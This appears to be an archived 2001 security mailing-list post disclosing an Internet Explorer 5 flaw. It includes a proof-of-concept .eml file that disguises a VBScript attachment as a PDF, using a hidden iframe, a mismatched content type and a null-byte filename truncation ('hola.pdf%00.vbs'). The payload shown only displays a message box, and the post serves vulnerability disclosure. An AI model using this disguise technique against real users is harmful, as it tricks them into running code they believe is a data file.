OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Jesús López de Aguileta (aguiletaEUNATE.NET)
Date: Mon Apr 02 2001 - 15:11:53 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi,

    Playing with Cuartango´s recently exploit
    (http://www.kriptopolis.com/cua/eml.html) I've found that it´s possible to trick
    an user to execute one file making he/she think it's a data file of any kind
    (pdf, mpeg,...).

    This works on both NT and 2000 using IE 5.1 (other platforms/IE versions not
    tested).

    I have already downloaded the MS01-20 patch in the systems tested but both
    appears to be not vulnerable to Cuartango's exploit (msgbox: "This update does
    not need to be installed on your system"), probably because both have updated
    Media Player 7 installed.

    I think this is a completely different issue and excuse me if it's previously
    solved/commented.

    Detail:

    --------8<----cut here-------8<

    From: "Ripped from Juan Carlos Garcia Cuartango"
    Subject: mail
    Date: Thu, 2 Nov 2000 13:27:33 +0100
    MIME-Version: 1.0
    Content-Type: multipart/related;
     type="multipart/alternative";
     boundary="1"
    X-Priority: 3
    X-MSMail-Priority: Normal

    --1
    Content-Type: multipart/alternative;
     boundary="2"

    --2
    Content-Type: text/html;
     charset="iso-8859-1"
    Content-Transfer-Encoding: quoted-printable

    <HTML>
    <HEAD>
    </HEAD>
    <BODY bgColor=3D#ffffff >
    <iframe src=3Dcid:donthurtme.pdf height=3D0 width=3D0></iframe>
    Done<br>
    </BODY>
    </HTML>

    --2--

    --1
    Content-Type: application/x-shockwave-flash;
     name="hola.vbs"
    Content-Transfer-Encoding: quoted-printable
    Content-ID: <donthurtme.pdf>

    msgbox("Hello")

    --1

    --------8<--cut here---------8<

    Making an .eml file with the above content and browsing it with IE 5, displays a
    window for download or online browse the "FILE" (not program) "donthurtme.pdf".
    If the user choose to online browse it, the VBscript code execute.

    Another interesting issue is that, when replacing: mime 1 part with:

    --1
    Content-Type: application/xxxx;
     name="hola.pdf%00.vbs"
    Content-Transfer-Encoding: quoted-printable
    Content-ID: <donthurtme.pdf>

    msgbox("Hello")

    --1

    IE truncate in the popup window the name displaying "hola.pdf" instead of
    "hola.pdf%00.vbs", making the user thinks that the extension of the program is
    different. Notice that in this second case, IE properly ask for "Run this
    PROGRAM" or "Save this PROGRAM", only the extension may confuse the user.

    Regards and excuse my poor English.

    Jesus Lopez de Aguileta